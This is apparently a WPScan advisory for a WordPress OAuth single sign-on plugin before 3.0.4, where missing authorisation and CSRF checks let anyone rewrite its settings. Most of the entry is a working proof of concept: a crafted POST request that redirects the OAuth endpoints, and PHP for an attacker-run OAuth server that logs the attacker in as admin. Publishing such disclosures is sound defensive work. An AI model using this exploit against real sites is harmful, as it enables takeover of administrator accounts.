WordPress Plugin Vulnerabilities
OAuth client Single Sign On for WordPress < 3.0.4 - Unauthenticated Settings Update to Authentication Bypass
Description
The plugin does not have authorisation and CSRF when updating its settings, which could allow unauthenticated attackers to update them and change the OAuth endpoints to ones they controls, allowing them to then be authenticated as admin if they know the correct email address
Proof of Concept
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=oauthconfig&OAuthConfig_nonce=-&oauthservers=Custom_OAuth&client_id=-&client_secret=-&rquest_in_body=1&client_authorization=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fauth%3D1&client_token_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Ftoken%3D1&client_userinfo_endpoint=http%3A%2F%2Flocalhost%2Foauth-exploit.php%3Fresource%3D1
With exploit.php controlled by the attacker with
/** auth endpoint */
if ( isset( $_GET['auth'] ) ) {
if ( isset( $_GET['response_type'] ) ) {
if ( 'code' == $_GET['response_type'] ) {
header( 'Location: ' . $_GET['redirect_uri'] . '/?' . http_build_query( array(
'code' => '-', //can be anything, just don’t be empty
) ) );
exit;
}
}
}
/** token endpoint */
if ( isset( $_GET['token'] ) ) {
if ( isset( $_POST['grant_type'] ) ) {
echo json_encode( array(
'access_token' => '-', //can be anything, just don’t be empty
) );
exit;
}
}
/** resource endpoint */
if ( isset( $_GET['resource'] ) ) {
echo json_encode( array(
'email' => 'admin@localhost',
'user_login' => '-', //can be anything, just don’t be empty
) );
exit;
}
Affects Plugins
Fixed in 3.0.4 References
Classification
Type
AUTHBYPASS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-09-05 (about 1 years ago)
Added
2022-09-05 (about 1 years ago)
Last Updated
2023-01-12 (about 1 years ago)
WPScan 